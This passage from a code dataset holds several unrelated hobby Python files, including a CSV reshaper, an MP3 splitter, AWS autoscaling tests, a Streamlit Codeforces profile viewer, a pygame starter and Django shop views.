to be easily opend by Excel\n# @input List : fieldList\n# @input List : headerList\n# @return file: .txt file in saveas location\n\ndef TxtWriter(fieldList, headerList):\n\n #important variables\n writeList = []\n\n #get filename for writefile and open it\n filename = asksaveasfilename(title='Save As :', defaultextension='.txt')\n with open(filename, mode='w', newline = '') as wfile:\n writer = csv.writer(wfile, dialect='excel-tab')\n\n #write the headers\n if headerList:\n writer.writerow(headerList)\n\n #iterate over the 'rows'\n for row in range(len(fieldList[0])):\n #iterate over the 'collumns'\n for col in range(len(fieldList)):\n writeList.append(fieldList[col][row])\n #end for-loop\n writer.writerow(writeList)\n writeList.clear()\n #end for-loop\n #end with-block\n\n\n\n#FUNCTION: GetUserInput(prompt, errorMessage)\n# This is a helper function to get input and avoid repeating code\n# @input str: prompt\n# @input str: errorMessage\n# @return str: inputString\n\ndef GetUserInput(prompt, errorMessage, typeCheck):\n while True: #Can I say that, this while loop is not my code, and I hate its style. However, it works!\n if typeCheck == 'int':\n try:\n _input = int(input(prompt))\n except ValueError:\n print(errorMessage)\n continue\n else:\n print(\"Valid input\")\n break\n elif typeCheck == 'bool':\n try:\n _input = bool(input(prompt))\n except ValueError:\n print(errorMessage)\n continue\n else:\n print(\"Valid input\")\n break\n #end if-elif block\n #end while-loop\n\n return _input\n\n#FUNCTION: FieldImporter(filedir)\n# This functions grabs the fields by each line and stores them in the dynamic list\n# @input str : filedir\n# @return list: fieldList\n# @return list: headerList\n\ndef FieldImporter(filedir):\n\n #instantiations\n fieldLocations = []\n headerList = []\n\n #Get the number of fields to import\n howManyFields = GetUserInput('How many fields to import? ', 'Not an int', 'int')\n\n #Instantiate the main list\n fieldList = [[] for i in range(howManyFields)]\n\n #get field locations (will account for human counting later)\n print('Input the collumn numbers in the order you want them to appear in the output file')\n print('i.e. If you want the 5th collumn in the 1st collumn of the output list,')\n print('give me 5 as the first entry then list the rest as you like')\n for i in range(howManyFields):\n fieldLocations.append(GetUserInput('Collumn number of field to be imported', 'Thats not an integer', 'int'))\n #end for-loop\n \n #Get Headers\n hasHeaders = GetUserInput('Does your data have headers? 
(Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n if hasHeaders:\n importHeaders = GetUserInput('Want to import your headers? (Use: True/False or 1/0)', 'Not a boolean value', 'bool')\n #end if-block\n\n if not importHeaders:\n makeHeaders = GetUserInput('Want to create headers for your data?\\nNote: Only make headers for the fields you will import')\n else:\n makeHeaders = False\n #end if-else\n\n if makeHeaders:\n for i in range(howManyFields):\n headerList.append(GetUserInput('Header name for field: ', 'Not an integer', 'int'))\n firstLine = GetUserInput('Which row is the first line of data (give line with the headers on it)', 'Not an interger', 'int')\n\n #open the file and start reading\n with open(filedir) as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n if importHeaders:\n headerLoop = True\n else:\n headerLoop = False\n for i in range(firstLine - 1): #skip the lines til the first line\n next(reader)\n for row in reader:\n if headerLoop:\n for i in range(howManyFields):\n headerList.append(row[fieldLocations[i] - 1])\n #end for-loop\n headerLoop = False\n else:\n for i in range(howManyFields):\n #use the fieldLocations and iterate through their locations and get them from the row iterable\n fieldList[i].append(row[fieldLocations[i] - 1]) #account for human counting\n #end for-loop\n #end if-else block\n #end for-loop\n #end with-block\n return fieldList, headerList\n\n \n\n# MAIN ALGORITHM\n\ndef main():\n\n filedir = GetFile()\n fieldList, headerList = FieldImporter(filedir)\n TxtWriter(fieldList, headerList)\n\n\n#RUN IT!!\n\nmain()\n \n","repo_name":"mmain10/Python-Scripts","sub_path":"CSV Data Shaper.py","file_name":"CSV Data Shaper.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19681638623","text":"import os\nimport time\nimport gc\nimport modules.helpers as helpers\nfrom pydub import AudioSegment\nfrom tqdm import tqdm\n\nclass Splitter:\n\n\tdef __init__(self, path, chunklength, output_directory):\n\t\tself.path = path\n\t\tself.output_directory = output_directory\n\t\tself.chunklength = chunklength\n\n\tdef split_to_chunks(self, new_name):\n\n\t\t'''\n\t\ttakes an original file, and splits it into chunk size in new path.\n\n\t\tParameters:\n\t\tnew_name (str): a new filename without extension or path\n\n\t\tex: \"users\\\\file.mp3\" should be inserted as \"file\"\n\t\t'''\n\n\t\taudio_file = AudioSegment.from_mp3(self.path)\n\n\t\taudio_remaining = True\n\t\tbeg_segment = 0\n\n\t\tpbar = tqdm(total=len(audio_file))\n\n\t\twhile audio_remaining:\n\t\t\tend_segment = beg_segment + self.chunklength\n\n\t\t\t#if remaining audio is less than chunk size, export remaining length\n\t\t\tif end_segment > len(audio_file):\n\t\t\t\tremaining_audio = end_segment - len(audio_file)\n\t\t\t\tremaining_audio = remaining_audio * -1\n\t\t\t\tfull_segment = audio_file[remaining_audio:]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" +\n\t\t\t\t\t\t\tstr(helpers.convert_to_mins(len(audio_file))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\t\taudio_remaining = False #break\n\t\t\telse:\n\t\t\t\tfull_segment = audio_file[beg_segment:end_segment]\n\n\t\t\t\tnew_path = self.output_directory + \"\\\\\" + new_name\n\t\t\t\tnew_path = (new_path + \"_\" + str(helpers.convert_to_mins((beg_segment))) + \"-\" + 
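# the chunk file name carries its start-end minute range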
\n\t\t\t\t\t\t\tstr(helpers.convert_to_mins((end_segment))) + \".mp3\")\n\n\t\t\t\tfull_segment.export(new_path, format=\"mp3\")\n\n\t\t\tstart = beg_segment\n\t\t\tbeg_segment += self.chunklength #iterate\n\n\t\t\t#using this instead of regular update to make it look nicer\n\t\t\thelpers.incriment_pbar(start, beg_segment, pbar)\n\n\t\tdel audio_file\n\t\tpbar.close()\n\t\tgc.collect()\n\ndef split_all(input_directory, files_list, chunklength, output_directory):\n\n\t'''\n\tuses split_to_chunks() to loop over all files in a list of files, and split them.\n\tDeletes all files in files_list when finished.\n\n\tParameters:\n\n\tinput_directory (str): path to input directory\n\n\tfiles_list (list of str): list of files converted (ex: filename.mp3) \n\t\t\t\t\t\t\t\tpassed from AudioConverter.convert_all()\n\n\tchunklength (int): length per file (in milliseconds)\n\n\toutput_directory (str): Output directory of split files.\n\n\t'''\n\n\tprint(\"\\n\\nSplitting files\\n\\n\")\t\n\ti = 1\n\n\tfor file in files_list:\n\n\t\tprint(\"splitting: {}, file {} of {}\".format(file, str(i), str(len(files_list))) )\n\n\t\tfull_path = input_directory + \"\\\\\" + file\n\t\tfile_to_split = Splitter(full_path, chunklength, output_directory)\n\n\t\tname_without_ext = file.split(\".mp3\")[0]\n\t\tfile_to_split.split_to_chunks(name_without_ext)\n\n\t\ti += 1\n\n\tdelete_files(input_directory, files_list)\n\ndef delete_files(path, files_list):\n\n\t'''\n\tDeletes all files from files_list in a given path (directory)\n\n\tParameters:\n path (str): directory of files to be deleted\n files_list: list of files to delete within given directory.\n\n\t'''\n\tfor file in files_list:\n\t\tfull_path = path + \"\\\\\" + file\n\t\tif os.path.exists(full_path):\n\t\t\tos.remove(full_path)\n\t\t\tprint(full_path + \" removed.\")\n\n\n","repo_name":"MeijiIshinIsLame/miaudio","sub_path":"miaudio/modules/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"16599815954","text":"from sklearn.preprocessing import normalize\nimport pandas as pd\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import (\n cross_validate,\n cross_val_predict,\n)\nfrom matplotlib import ticker\nimport numpy as np\nimport seaborn as sns\n\nplt.rcParams[\"font.size\"] = 18\nfig = plt.figure()\n# from sklearn.svm import KNeighborsRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\n\nresults = pd.read_csv(\"KNNoptimize\\knn遍历neighbourp.csv\")\n\n# show the first 5 rows\n\nxc = results[\"param_n_neighbors\"].to_numpy()\nye = results[\"param_p\"].to_numpy()\nresults[\"mean_test_score\"] = abs(results[\"mean_test_score\"])\nvm = abs(results[\"mean_test_score\"].to_numpy())\nprint(vm)\nresults = pd.DataFrame(\n results, columns=[\"param_n_neighbors\", \"param_p\", \"mean_test_score\"]\n)\n\nresults = results.pivot(\n index=\"param_n_neighbors\", columns=\"param_p\", values=\"mean_test_score\"\n)\nplot = sns.heatmap(results, cmap=\"viridis\").invert_yaxis()\nplt.xlabel(\"p\")\nplt.ylabel(\"n neighbour\")\nplt.savefig(\"KNNoptimize\\drawing.svg\")\n","repo_name":"sch401/bcbpd","sub_path":"3_different ML model traning and selection/KNN/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71990070501","text":"import 
os\nimport sys\nimport yaml\n\nfrom shutil import copy\nfrom tabulate import tabulate\nclass ShellPath :\n '''\n Designate the position of shell scripts and \n check the shell scripts registered with gmd.\n '''\n def __init__(self) :\n self.shellpath = \"%s/shell\"%(os.path.split(os.path.dirname(__file__))[0])\n self.files = [f for f in os.listdir(self.shellpath)]\n\n def register_shell(self,shellpath):\n '''\n Save shell file\n '''\n if os.path.isfile(shellpath):\n filename = os.path.basename(shellpath)\n filepath = os.path.abspath(\"%s/%s\"%(self.shellpath,filename))\n if os.path.isfile(filepath):\n print(\"%s is already enrolled\\n\"%(filename))\n else :\n copy(shellpath,filepath)\n print(\"%s Successfully Save \"%(filepath))\n else :\n print(\"%s isn't file\"%(shellpath))\n\n def check(self):\n '''\n Check shell file registered \n '''\n shell = [] ; numberlist =[] ;number = 1\n for f in self.files :\n if f.split(\".\")[-1] == 'sh' :\n shell.append([number, f])\n numberlist.append(number)\n number += 1\n print(\"\\n\\n\",tabulate(shell, tablefmt='grid'),end='\\n\\n') \n return shell, numberlist\n\n def remove(self) :\n '''\n Remove the shell file registered\n '''\n shell, number = self.check()\n\n while True :\n r = int(input(\"Please enter the script name for removal >> \"))\n if r in number :\n break\n os.remove(\"{}/{}\".format(self.shellpath, shell[r-1][-1]))\n print(\"{} scirpt is deleted\".format(shell[r-1][-1]))\n\n def generateshell(self, shell) :\n \n # add function in 20220203\n if not os.path.isfile(shell['vasp_std']) :\n print(shell['vasp_std'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_ncl']):\n print(shell['vasp_ncl'],\"is not file\")\n sys.exit(1)\n elif not os.path.isfile(shell['vasp_gam']):\n print(shell['vasp_gam'],\"is not file\")\n sys.exit(1)\n # \n \n while True :\n regist = input(str(\"Please enter Y to register shell script, otherwise enter N >> \"))\n if regist == 'Y' :\n path = self.shellpath + \"/{}.sh\".format(shell['shell_name'])\n break\n elif regist == 'N' :\n path = \"{}.sh\".format(shell['shell_name'])\n break\n else :\n print(\"Please Enter Y or N\")\n\n with open(path,'w') as sh :\n sh.write(\"#!/bin/sh\\n\")\n sh.write(\"# control options #\\n\")\n sh.write(\"#PBS -N {} \\n\".format(shell['shell_name']))\n sh.write(\"#PBS -l nodes={}:ppn={}:{}\\n\".format(shell['node'],shell['ppn'],shell['node_name']))\n sh.write(\"########\\n\")\n sh.write(\"#PBS -q {}\\n\".format(shell['node_name']))\n sh.write(\"#PBS -o out.log\\n\")\n sh.write(\"#PBS -j oe\\n\")\n \n sh.write(\"\\n# PATH & EXE\\n\")\n sh.write(\"EXE='{}'\\n\".format(shell['vasp_std']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_ncl']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_gam']))\n \n sh.write(\"\\n#\\n\")\n sh.write(\"NUMBER=`cat $PBS_NODEFILE | wc -l`\\n\")\n sh.write(\"cd $PBS_O_WORKDIR\\n\")\n \n sh.write(\"\\n# run \\n\")\n sh.write(\"echo job started at `date` >> time\\n\")\n sh.write(\"{} -np $NUMBER -machinefile $PBS_NODEFILE $EXE > $PBS_JOBNAME.out\\n\".format(shell['mpi_command']))\n sh.write(\"echo job ended at `date` >> time\\n\")\n \n sh.close()","repo_name":"jgp505/perovgen","sub_path":"pygmd/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"28142041021","text":"import boto3\nfrom boto3.session import Session\nfrom boto3.dynamodb.conditions import Key, Attr\nimport os\nimport pickle\nfrom io import BytesIO\nfrom 
sklearn.preprocessing import StandardScaler, OneHotEncoder, LabelEncoder, LabelBinarizer,MultiLabelBinarizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import train_test_split, GridSearchCV, KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_score,StratifiedKFold, cross_validate\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, precision_score, recall_score, roc_auc_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.base import BaseEstimator, TransformerMixin\nimport pandas as pd\nimport DynamoDBClient\n\ndynamodb = boto3.resource('dynamodb')\nclient = boto3.client('dynamodb', region_name='eu-west-2')\ns3 = boto3.resource('s3')\n\nACCESS_KEY = os.environ['AWS_ACCESS_KEY_ID']\nSECRET_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nAWS_DEFAULT_REGION = os.environ['AWS_DEFAULT_REGION']\n\n\nclass ML():\n\n def __init__(self):\n\n with BytesIO() as data:\n s3.Bucket(\"artificial-demo\").download_fileobj(\"xgb.pkl\", data)\n data.seek(0) # move back to the beginning after writing\n self.xgb = pickle.load(data)\n \n db = DynamoDBClient.DynamoDB(db_name = \"customer\")\n self.data = pd.DataFrame(db.get_all_items())\n\n print(\"----------------------------------------\")\n print(self.data.tail(1))\n \n def predict(self):\n\n\n y_pred=self.xgb.predict([self.X[-1]])\n y_proba=self.xgb.predict_proba([self.X[-1]])\n print(y_pred)\n print(y_proba)\n\n return y_pred,y_proba\n \n def pre_process(self, data):\n print(\"####### PRE-PROCESSING ###########\")\n #Numeric Features\n numeric_features= list(data.columns[data.dtypes == 'int64'])\n scaler = StandardScaler()\n scaled_data = scaler.fit_transform(data[numeric_features])\n scaled_data = pd.DataFrame(data=scaled_data, columns=numeric_features)\n\n #Binary Features\n binary_features = [\"default\", \"housing\", \"loan\", \"y\"]\n lb = BinaryTransformer()\n binarised_features = lb.fit_transform(data[binary_features])\n\n # Multioutput Features\n categorical_features = list(set(list(data.columns[data.dtypes == 'object'])) - set(binarised_features))\n ohe_data = pd.get_dummies(data[categorical_features])\n new_categorical_features = ohe_data.columns\n\n cleaned_data = pd.concat([scaled_data, binarised_features, ohe_data], axis=1)\n\n \n self.X = cleaned_data.drop('y', axis=1)\n self.y = cleaned_data['y']\n \n print(\"####### REEEE ###########\")\n print(self.X.shape)\n\n pca = PCA(n_components=32)\n self.X = pca.fit_transform(self.X)\n print(self.X.shape)\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.2, stratify=self.y)\n\n\n\nclass BinaryTransformer( BaseEstimator, TransformerMixin ):\n #Class Constructor \n def __init__(self):\n pass\n \n #Return self nothing else to do here \n def fit( self, X, y = None ):\n return self \n \n #Method that describes what we need this transformer to do\n def transform( self, X, y = None ):\n self.columns = list(X.columns)\n result = X.copy()\n for c in result.columns:\n result[c] = result[c].apply(lambda x: 1 if x==\"yes\" else 0)\n \n return result","repo_name":"lok63/artificial_serverless","sub_path":"machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25432613834","text":"from datetime import datetime\r\nfrom aws_wrappers import 
AWS_Wrappers\r\nfrom utility import Utility\r\nutility = Utility()\r\naws_wrappers =AWS_Wrappers()\r\n\r\ndef test_ScheduledActions(ASGName): #TestCase B: Point 1: Find the Scheduled actions of given ASG which is going to run next and calcalate elapsed in hh:mm:ss from current time.\r\n try:\r\n scheduled_action_details = aws_wrappers.get_scheduled_actions(ASGName) # Get the sheduled actions of ASG\r\n scheduled_actions_list = scheduled_action_details.scheduled_update_group_actions #List of Scheduled of scheduled actions\r\n if len(scheduled_actions_list) == 0:\r\n print(\"No Scheduled Actions found\")\r\n assert False\r\n\r\n scheduled_action_recurrence={}\r\n try:\r\n for scheduled_action in scheduled_actions_list:\r\n # Get the next running time from Cron Expression and get the time delta between now and cron expression time\r\n scheduled_action_recurrence[scheduled_action.scheduled_action_name] = (utility.get_next_schedule_from_cron(scheduled_action.recurrence)-datetime.now()).total_seconds()\r\n\r\n next_running_job= min(scheduled_action_recurrence, key=scheduled_action_recurrence.get) # Get the minimum time of jobs which is nothing but latest job to run\r\n print(\"Job to Run Next : \" + next_running_job)\r\n except KeyError:\r\n pass ## if job is non recurring\r\n try:\r\n ## To find elapsed time from now from previous ran all jobs\r\n for scheduled_action in scheduled_actions_list:\r\n action_name= scheduled_action.scheduled_action_name # Get all action name list\r\n time_elapsed = datetime.now() - utility.get_previous_schedule_from_cron(scheduled_action.recurrence) # Get time of previous run from Cron\r\n print(\"Time Elapsed: \" + action_name + \" \"+str(time_elapsed)) ## prints elapsed time in hh:mm:ss\r\n assert True\r\n except KeyError:\r\n pass ## if job is non recurring\r\n except Exception as e:\r\n assert False\r\n\r\ndef test_ScalingDayActivity(ASGName):\r\n try:\r\n scaling_activities = aws_wrappers.describe_scaling_activities(ASGName) # Get all scaling activities result\r\n today_activities= []\r\n for activities in scaling_activities:\r\n for act in activities:\r\n start_date = act['StartTime'].date() # get the start time of the instance\r\n status = act['StatusCode']\r\n if start_date == datetime.now().date() and status == 'Successful': # Get the activities of today wich are success\r\n today_activities.append(act['ActivityId'])\r\n if len(today_activities)==0:\r\n print(\"No instances Launched or Terminated today\")\r\n assert False\r\n else:\r\n print (str(len(today_activities))+ \" instances launched or terminated today\")\r\n assert True\r\n except Exception as e:\r\n print(str(e))\r\n assert False\r\n\r\n\r\n","repo_name":"csegourab6/livevox-assignment-task-1","sub_path":"test_ScheduledActions.py","file_name":"test_ScheduledActions.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75249470180","text":"import random\r\nfrom typing import ParamSpecArgs\r\ndef get_choices():\r\n player_choice=input(\"Choose your choice in(stone,paper,sessor)\")\r\n option=[\"rock\",\"paper\",\"sissor\"]\r\n computer_choice=random.choice(option)\r\n choices={\"player\":player_choice,\"computer\":computer_choice}\r\n return choices\r\ndef dj(player,computer):\r\n print(f\"you choose {player} computer choose {computer}\")\r\n if player==computer:\r\n return \"draw\"\r\n elif player==\"rock\":\r\n if computer==\"paper\":\r\n return \"paper will cover the rock and You lost\"\r\n 
else:\r\n return \"rock will cut the sissor and You win\"\r\n elif player==\"sissor\":\r\n \r\n if computer==\"paper\":\r\n return \"sissor will cut the paper,You Win\"\r\n else:\r\n return \"rock will broke the sissor,You lost\"\r\n\r\n elif player==\"paper\":\r\n if computer==\"sissor\":\r\n return \"sissor will cut the paper,you lost\"\r\n else:\r\n return \"paper will cover the stone ,you win\"\r\na=get_choices()\r\nresult=dj(a[\"player\"],a[\"computer\"])\r\nprint(result)\r\n","repo_name":"shanmugapandiyan/python-basics","sub_path":"python_simple_game.py","file_name":"python_simple_game.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23297862150","text":"s = [\"Franta\", \"Pepa\", \"Vašek\", \"Ignác\"]\r\n\r\n\r\ndef od1():\r\n global s\r\n s.append(input(\"napiš další jméno\"))\r\n otazka()\r\n\r\n\r\ndef od2():\r\n global s\r\n print(s)\r\n s.remove(input(\"napis jmeno\"))\r\n otazka()\r\n\r\n\r\ndef od3():\r\n global s\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od4():\r\n global s\r\n print(\"v seznamu je\", len(s), \"jmen\")\r\n otazka()\r\n\r\n\r\ndef od5():\r\n global s\r\n s.sort()\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od6():\r\n print(\"ok\")\r\n\r\n\r\ndef otazka():\r\n global s\r\n print(\"1.Pridat jmeno\")\r\n print(\"2.odebrat jmeno\")\r\n print(\"3.vypsat seznam\")\r\n print(\"4.kolik je jmen v seznamu\")\r\n print(\"5.seznam jsem podle abecedy\")\r\n print(\"6.konec programu\")\r\n o = int(input(\"vyber\"))\r\n if o == 1:\r\n od1()\r\n if o == 2:\r\n od2()\r\n if o == 3:\r\n od3()\r\n if o == 4:\r\n od4()\r\n if o == 5:\r\n od5()\r\n elif o == 6:\r\n od6()\r\n\r\n\r\notazka()\r\n","repo_name":"EducaNet-school/zelvi-grafika-PetrPujman","sub_path":"seznamy/seznamy 6.py","file_name":"seznamy 6.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42407309987","text":"import altair as alt\nimport datetime\nimport streamlit as st\nimport json\nimport requests\nimport pandas as pd\nimport pycountry as pc\n\n\ndef find_best_matches(strs, s):\n results = []\n for x in strs:\n if s.lower() in x.lower():\n results.append(x)\n if len(results) == 7:\n return results\n return results\n\n\ndef main():\n\n data = []\n handle_tuples = []\n handles = []\n default_index = 0\n with open('codeforces_crawler\\codeforces_crawler\\spiders\\items_codeforces_spider_4.jl') as file:\n for i, line in enumerate(file):\n json_obj = json.loads(line)\n data.append(json_obj)\n handle_tuples.append((json_obj['handle'], i))\n if json_obj['handle'] in 'y0urs3lf':\n default_index = i\n handles = [t[0] for t in handle_tuples]\n\n st.write(\"# Codeforces User's Profile\")\n\n query = st.text_input(\n \"label\", placeholder=\"Enter a handle you want to find. 
For example: y0urs3lf\", label_visibility='hidden')\n\n selected_handle = \"\"\n\n # and ((not 'check' in st.session_state) or st.session_state['check'] == False):\n button_frames = []\n if query != \"\":\n # Call the search function and display the results\n results = find_best_matches(handles, query)\n if len(results) == 0:\n st.write(\"No results found\")\n else:\n st.write(f'Best results for **{query}**:')\n # (not 'check' in st.session_state) or st.session_state['check'] == False:\n if True:\n for result in results:\n # Display the result as a clickable link\n button_frame = st.empty()\n isClicked = button_frame.button(\n result, use_container_width=True, key=result)\n button_frames.append((button_frame, result))\n if isClicked:\n # Change the context of the page based on the selected result\n # result_frame.empty()\n selected_handle = result\n # st.session_state['check'] = True\n break\n\n if selected_handle != \"\":\n for (frame, handle) in button_frames:\n if handle != selected_handle:\n frame.empty()\n\n index = handles.index(selected_handle)\n\n user_info = data[index]\n rank = user_info['rank'][0:len(user_info['rank'])-1]\n color = get_color(rank)\n cur_handle = user_info[\"handle\"]\n\n st.markdown(\n f'

    <span style=\"color: {color}; font-weight: bold;\">{rank.title()}</span><br/><span style=\"color: {color}; font-size: 1.6em; font-weight: bold;\">{cur_handle}</span>
    ', unsafe_allow_html=True)\n\n # flag image and country\n country = user_info[\"country\"]\n if country != \"\":\n country_code = get_country_code(country).lower()\n image_url = f'https://codeforces.org/s/33207/images/flags-16/{country_code}.png'\n st.markdown(\n f'

    <img src=\"{image_url}\"/> {country}
    ',\n unsafe_allow_html=True\n )\n else:\n st.markdown(\n f'

    {country}
    ',\n unsafe_allow_html=True\n )\n\n # rating\n st.markdown(\n f'

    Rating: {str(user_info[\"rating\"])}
    ',\n                unsafe_allow_html=True\n            )\n\n        # max rating\n        max_rating_color = get_color(user_info[\"max_rank\"])\n        st.markdown(\n            f'
    <span style=\"color: {max_rating_color}; font-weight: bold;\">
    Max Rating: {str(user_info[\"max_rating\"])}, {user_info[\"max_rank\"].title()}', unsafe_allow_html=True\n )\n\n # request data to render the chart\n # return\n url = f\"https://codeforces.com/api/user.rating?handle={selected_handle}\"\n response = requests.get(url).json()\n\n if response[\"status\"] == \"OK\":\n data = response[\"result\"]\n\n contestName, rating, time, rank = [], [], [], []\n for x in data:\n contestName.append(x.get(\"contestName\"))\n rating.append(x.get(\"newRating\"))\n\n # convert time from unix-format -> date\n timestamp = x.get(\"ratingUpdateTimeSeconds\")\n dt_object = datetime.datetime.fromtimestamp(timestamp)\n formatted_date = dt_object.strftime('%Y-%m-%d')\n time.append(formatted_date)\n\n rank.append(x.get(\"rank\"))\n\n chart_data = pd.DataFrame(\n {\n 'contestName': contestName,\n 'rating': rating,\n 'time': time,\n 'rank': rank,\n })\n\n # altair support rendering chart with limit value in the axis\n y_min = max(0, min(chart_data[\"rating\"]) - 100)\n y_max = max(chart_data[\"rating\"]) + 100\n\n scale = alt.Scale(domain=(y_min, y_max))\n\n chart = alt.Chart(chart_data).mark_line(\n point=alt.OverlayMarkDef(\n size=50, filled=False, color=\"#4A55A2\", fill=\"#A0BFE0\"), # properties of the point\n color=\"#A0BFE0\" # color of the line\n ).encode(\n x='time:T', # the :T is added to display x-axis as Time, not String => more interactive\n # the alt.y is added to show the points in certain range\n y=alt.Y('rating', scale=scale),\n tooltip=['contestName', 'rank'],\n ).interactive()\n\n # Render the chart using Streamlit\n st.altair_chart(chart, use_container_width=True)\n else:\n st.write(\"**Error:**\", response[\"comment\"])\n else:\n pass\n\n\ndef get_color(rank):\n if rank == \"legendary grandmaster\":\n return \"black\"\n if rank == \"international grandmaster\":\n return \"red\"\n if rank == \"grandmaster\":\n return \"red\"\n if rank == \"international master\":\n return \"orange\"\n if rank == \"master\":\n return \"orange\"\n if rank == \"candidate master\":\n return \"purple\"\n if rank == \"expert\":\n return \"blue\"\n if rank == \"specialist\":\n return \"cyan\"\n if rank == \"pupil\":\n return \"green\"\n return \"grey\"\n\n\ndef get_country_code(country_name):\n if country_name == \"Vietnam\":\n return \"Vn\"\n if country_name == \"Taiwan\":\n return \"Tw\"\n try:\n country = pc.countries.get(name=country_name)\n return country.alpha_2\n except AttributeError:\n return \"\"\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnnam03/codeforces-tools","sub_path":"no_api_cf_user_info.py","file_name":"no_api_cf_user_info.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8095913568","text":"import pygame\nfrom player import Player\n\n# Initialize pygame\npygame.init()\n\n# Create the screen (width, height)\nscreen = pygame.display.set_mode((800, 640))\nprint(\"Hello\")\n\n# Title and Icon\n# Caption is the title of the window\npygame.display.set_caption(\"Jeraldyn\")\n# Icon is the image on the top left of the window\n#icon = pygame.image.load('ufo.png')\n# Set the icon\n#pygame.display.set_icon(icon)\n\n# Player Images\nplayerImg = pygame.image.load('Images/Main-Character/character-0.png')\n\n# Create Instance of player\nplayer = Player()\n\n# Game loop\nrunning = True\n\n# While the game is running\nwhile running:\n\n # Event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n 
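# clear the frame to the background colour before redrawing\n    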
screen.fill((91,153,139))\n\n #Update the player\n player.update(event)\n \n # Draw the player\n screen.blit(playerImg, (player.playerX, player.playerY))\n\n # Update the screen\n pygame.display.update()","repo_name":"jalenm872/Pygame-Game-One","sub_path":"first-game.py","file_name":"first-game.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73638295139","text":"from django.db.models import Prefetch, Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\n\nfrom apps.sneaker.models import Sneaker, SneakerSize, Brand\n\nSORT_RULE_MAP = {\n 1: '-click_num',\n 2: '-created_at',\n 3: '-discount_price',\n 4: 'discount_price',\n}\n\n\ndef get_sneakers_sort(sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n return Sneaker.objects.prefetch_related('sneaker_image').filter(is_active=True).order_by(sort_key)\n\n\ndef get_sneakers_with_brand_sort(brand_id, sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n brand = get_object_or_404(Brand, id=brand_id)\n sneakers = Sneaker.objects.filter(\n Q(brand_id=brand_id) & Q(is_active=True)\n ).order_by(sort_key)\n return brand, sneakers\n\n\ndef sneaker_sort_return(request, brand_id, sort_rule):\n if brand_id == 0:\n sneakers = get_sneakers_sort(sort_rule)\n return render(request, 'index.html', {'sneakers': sneakers})\n else:\n brand, sneakers = get_sneakers_with_brand_sort(brand_id, sort_rule)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef sneaker_all(request):\n sneakers = get_sneakers_sort(1)\n return render(request, 'index.html', {'sneakers': sneakers})\n\n\ndef get_recommendation(sneaker_id):\n sneaker = get_object_or_404(Sneaker, id=sneaker_id)\n brand_id = sneaker.brand.id\n brand_sneakers = Sneaker.objects.filter(Q(brand_id=brand_id) & (~Q(id=sneaker_id))).order_by('-click_num')\n return brand_sneakers\n\n\ndef sneaker_detail(request, pk):\n sneaker = get_object_or_404(\n Sneaker.objects.prefetch_related(\n Prefetch('sneaker_size', queryset=SneakerSize.objects.order_by('size'))),\n pk=pk, is_active=True\n )\n\n click_num = sneaker.click_num\n sneaker.click_num = click_num + 1\n sneaker.save()\n\n other_sneakers = get_recommendation(sneaker.id)\n return render(request, 'sneaker/detail.html', {'sneaker': sneaker, 'other_sneakers': other_sneakers})\n\n\ndef brand_detail(request, pk=None):\n brand, sneakers = get_sneakers_with_brand_sort(pk, 1)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef search(request):\n keywords = request.GET.get('keywords')\n sneakers = Sneaker.objects.none()\n if 